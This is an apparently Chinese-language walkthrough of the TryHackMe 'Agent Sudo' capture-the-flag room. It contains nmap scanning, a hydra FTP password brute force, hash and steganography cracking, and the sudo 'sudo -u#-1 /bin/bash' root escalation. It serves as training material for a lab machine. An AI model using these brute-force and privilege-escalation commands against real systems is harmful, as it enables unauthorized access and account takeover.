tryhackme-Agent Sudo

描述：您在深海下发现了一个秘密服务器。你的任务是侵入服务器内部并揭露真相。

枚举

nmap -sV -T4 -v 10.10.123.164

NSE: Script scanning 10.10.123.164.
Initiating NSE at 02:16
Completed NSE at 02:16, 0.01s elapsed
Initiating NSE at 02:16
Completed NSE at 02:16, 0.00s elapsed
Nmap scan report for ip-10-10-123-164.eu-west-1.compute.internal (10.10.123.164)
Host is up (0.0053s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
MAC Address: 02:7F:20:E0:24:EF (Unknown)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.96 seconds
           Raw packets sent: 1002 (44.072KB) | Rcvd: 1002 (40.080KB)

网页端

 Dear agents,

Use your own codename as user-agent to access the site.

From,
Agent R 

解析

端口三个
codename ：user-agent

需要改变user-agent进行重放（由Agent R ，猜测为大写字符）https://www.ruanyifeng.com/blog/2019/09/curl-reference.html
curl -A "A" -L 10.10.123.164
当为
curl -A "C" -L 10.10.123.164
结果
Attention chris, <br><br>

Do you still remember our deal? Please tell agent J about the stuff ASAP. Also, change your god damn password, is weak! <br><br>

From,<br>
Agent R 
代理名称为chris

哈希破解和暴力破解

ftp

hydra -l chris -P /usr/share/wordlist/rockyou.txt 10.10.123.164 ftp 可得

binwalk -e cutie.png    对图片进行提取

zip2john 进行hash提取，john进行hash爆破,即可得到zip密码

解密的到一个字符串，base64解密 可得密码：Area51

使用stgehide对另一张图片进行隐写解密
steghide info jpg   //验证是否有隐藏
steghide extract -sf png    //进行解密提取

即可得到ssh的username，password

捕获用户标志

ssh登录，即可，
至于图片
scp james@10.10.123.164:png /localdir/    下载到本地，google识图

权限提升

sudo -l

(ALL, !root) /bin/bash

google搜索(ALL, !root) /bin/bash得到：https://www.exploit-db.com/exploits/47502

此时版本小于1.8.28 ：sudo -u#-1 /bin/bash 即可